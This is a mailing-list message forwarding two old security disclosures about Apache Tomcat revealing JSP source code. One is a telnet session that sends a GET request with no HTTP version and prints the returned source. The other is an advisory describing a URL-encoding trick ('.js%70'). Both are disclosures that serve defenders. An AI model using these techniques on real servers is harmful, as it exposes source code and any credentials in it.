Reported against Tomcat 3.2.1 on BugTraq.
Craig
Eric Daniel Mauricio wrote:
> There is another way to get the source from a jsp page using Tomcat.
>
> If you don't write HTTP/1.0 or HTTP/1.1 in the end of the GET request,
> you will get the source code and not the jsp processed.
>
> In other words, use Apache + Tomcat if you intend to protect your source code.
>
> telnet maq106 8080
> Trying 10.0.0.106...
> Connected to maq106
> Escape character is '^]'.
> GET /examples/jsp/num/numguess.jsp
> HTTP/1.0 200 OK
> Content-Type: text/plain
> Content-Length: 1237
> Last-Modified: Tue, 19 Dec 2000 18:54:46 GMT
> Servlet-Engine: Tomcat Web Server/3.2.1 (JSP 1.1; Servlet 2.2; Java 1.3.0;
> Windows 95 4.0 x86; java.vendor=Sun Microsystems Inc.)
>
> <!--
> Copyright (c) 1999 The Apache Software Foundation. All rights
> reserved.
>
> Number Guess Game
> Written by Jason Hunter, CTO, K&A Software
> http://www.servlets.com
> -->
>
> <%@ page import = "num.NumberGuessBean" %>
>
> <jsp:useBean id="numguess" class="num.NumberGuessBean" scope="session"/>
> <jsp:setProperty name="numguess" property="*"/>
>
> <html>
> <head><title>Number Guess</title></head>
> <body bgcolor="white">
> <font size=4>
>
> <% if (numguess.getSuccess()) { %>
>
> Congratulations! You got it.
> And after just <%= numguess.getNumGuesses() %> tries.<p>
>
> <% numguess.reset(); %>
>
> Care to <a href="numguess.jsp">try again</a>?
>
> <% } else if (numguess.getNumGuesses() == 0) { %>
>
> Welcome to the Number Guess game.<p>
>
> I'm thinking of a number between 1 and 100.<p>
>
> <form method=get>
> What's your guess? <input type=text name=guess>
> <input type=submit value="Submit">
> </form>
>
> <% } else { %>
>
> Good guess, but nope. Try <b><%= numguess.getHint() %></b>.
>
> You have made <%= numguess.getNumGuesses() %> guesses.<p>
>
> I'm thinking of a number between 1 and 100.<p>
>
> <form method=get>
> What's your guess? <input type=text name=guess>
> <input type=submit value="Submit">
> </form>
>
> <% } %>
>
> </font>
> </body>
> </html>
> Connection closed by foreign host.
>
> [],
>
> ericmau
>
> "Sverre H. Huseby" <[EMAIL PROTECTED]> escreveu:
>
> > Tomcat may reveal script source code by URL trickery
> > ----------------------------------------------------
> >
> > Sverre H. Huseby advisory 2001-03-29
> >
> >
> >
> > Systems affected
> > ----------------
> >
> > Tomcat 4.0-b1 (latest milestone) and nighly build as of 2001-03-28
> > tested. Other versions may be vulnerable too. The problem is only
> > present when using Tomcat's built in web server, not when using Tomcat
> > with Apache Web Server.
> >
> >
> > Description
> > -----------
> >
> > Tomcat (http://jakarta.apache.org/tomcat/), the Reference
> > Implementation for the Java Servlet 2.2 and JavaServer Pages 1.1
> > Technologies, may be tricked into revealing the source code of JSP
> > scripts by using simple URL encoding.
> >
> >
> > Details
> > -------
> >
> > It seems that the built in web server in Tomcat does URL decoding in
> > an unreasonable order. URLs like the following
> >
> > http://XXX:8080/examples/jsp/num/numguess.js%70
> >
> > where %70 is an URL encoded 'p', returns the source code of index.jsp
> > rather than running the script on the server side.
> >
> > To speculate: The JSP handler is skipped as this URL does not end in
> > ".jsp", but the static file handler is nevertheless able to map the
> > URL into a correct file name.
> >
> >
> > Impact
> > ------
> >
> > This design error makes it possible to fetch the source code of JSP
> > scripts. Such source code may contain database passwords and file
> > names, and may reveal design errors or programming bugs that make it
> > possible to further exploit the server or service.
> >
> >
> >
> > Reported by Sverre H. Huseby, [EMAIL PROTECTED]
> >
> > --
> > <URL:mailto:[EMAIL PROTECTED]>
> > <URL:http://shh.thathost.com/>
> >
